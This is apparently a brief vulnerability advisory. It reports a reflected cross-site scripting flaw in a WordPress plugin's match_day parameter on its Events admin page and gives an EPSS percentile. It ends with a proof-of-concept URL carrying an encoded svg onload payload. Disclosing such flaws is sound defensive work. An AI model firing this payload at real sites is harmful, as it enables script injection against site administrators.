EPSS
Percentile
43.7%
The plugin does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/edit.php?post_type=sp_event&match;_day="><svg%2Fonload%3Dalert(%2FXSS%2F)%3B><"